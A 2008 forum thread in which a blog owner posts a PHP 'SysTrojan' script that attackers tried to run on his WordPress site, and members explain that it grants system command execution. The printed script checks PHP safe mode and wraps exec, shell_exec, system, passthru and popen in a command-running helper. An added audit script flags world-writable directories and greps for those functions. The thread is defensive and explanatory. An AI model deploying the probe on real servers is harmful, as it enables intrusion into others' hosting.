
What does this script do?

Discussion in 'PHP & Perl' started by kalekom, Nov 29, 2008.

  1. kalekom

    kalekom Junior Member

    Could someone try to explain what the following script does? Someone tried to run it on my WP blog. The script is located at and called from
    Code:
    http://ingenieria.unilibrecali.edu.co/bot.txt??
    Script itself:
    Code:
    <html><head><title>SysTrojan</title></head><body bgcolor=DC143C>
    <H1>Wrong Place</H1>
    </html></head></body>
    <?php
    if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
        echo("Safe Mode of this Server is : ");
        echo("SafemodeOFF");
    }
    else{
        ini_restore("safe_mode");
        ini_restore("open_basedir");
        if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
            echo("Safe Mode of this Server is : ");
            echo("SafemodeOFF");
        }else{
            echo("Safe Mode of this Server is : ");
            echo("SafemodeON");
        }
    }
    function ex($cfe){
        $res = '';
        if (!empty($cfe)){
            if(function_exists('exec')){
                @exec($cfe,$res);
                $res = join("\n",$res);
            }
            elseif(function_exists('shell_exec')){
                $res = @shell_exec($cfe);
            }
            elseif(function_exists('system')){
                @ob_start();
                @system($cfe);
                $res = @ob_get_contents();
                @ob_end_clean();
            }
            elseif(function_exists('passthru')){
                @ob_start();
                @passthru($cfe);
                $res = @ob_get_contents();
                @ob_end_clean();
            }
            elseif(@is_resource($f = @popen($cfe,"r"))){
                $res = "";
                while(!@feof($f)) { $res .= @fread($f,1024); }
                @pclose($f);
            }
        }
        return $res;
    }
    exit;
    ?>
     
  2. chaoz

    chaoz Newbie

  3. fatboy

    fatboy Elite Member

    Yup - if that's on your server, start cleaning up pronto.
    If I read that correctly, the script will allow the attacker to run system commands on your server.
     
  4. vivalafeva

    vivalafeva Jr. VIP Jr. VIP Premium Member

    Why would you install something that you don't know what it is, especially when it says SysTrojan as the title?
     
  5. fatboy

    fatboy Elite Member

    The OP didn't install it - I would say that someone uploaded it to their hosting and tried to run it.

    Check to see if you have any directories that have permissions of world writable (777); that's a bad idea and allows people to upload stuff.

    Is this just shared hosting or is it your own server?
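
The permission check suggested in the post above, as an added example that is not part of the original thread: it lists world-writable directories under a web root and flags `.php`/`.txt` files in them that call the command-execution functions the posted `ex()` helper tries. The function names and the web-root argument are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not from the thread. Hits are leads for manual review,
# not proof of compromise: legitimate code also calls these functions.

# Functions that the posted ex() helper tries in turn.
EXEC_FUNCS='exec|shell_exec|system|passthru|popen'

# Print directories under $1 writable by "other" (mode 777 and similar).
world_writable_dirs() {
    find "$1" -type d -perm -0002 2>/dev/null | sort
}

# Print .php/.txt files directly inside $1 that call one of EXEC_FUNCS.
# .txt is included because the posted script was served as bot.txt.
# The leading character class skips names such as curl_exec().
suspicious_files() {
    find "$1" -maxdepth 1 -type f \( -name '*.php' -o -name '*.txt' \) \
        -exec grep -lE "(^|[^A-Za-z0-9_])@?(${EXEC_FUNCS})[[:space:]]*\(" {} + \
        2>/dev/null | sort
}

# Report each world-writable directory and the flagged files inside it.
audit_webroot() {
    world_writable_dirs "$1" | while IFS= read -r dir; do
        printf 'WORLD-WRITABLE %s\n' "$dir"
        suspicious_files "$dir" | sed 's/^/  EXEC-CALL /'
    done
}

# Usage: sh audit.sh /path/to/webroot   (path is an assumption)
if [ "$#" -gt 0 ]; then
    audit_webroot "$1"
fi
```

Directories reported as `WORLD-WRITABLE` should be tightened to the narrowest mode the application still works with, and any `EXEC-CALL` file that is not part of the installed software should be compared against a clean copy.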
     
  6. vivalafeva

    vivalafeva Jr. VIP Jr. VIP Premium Member

    Oh sorry, I understand now.
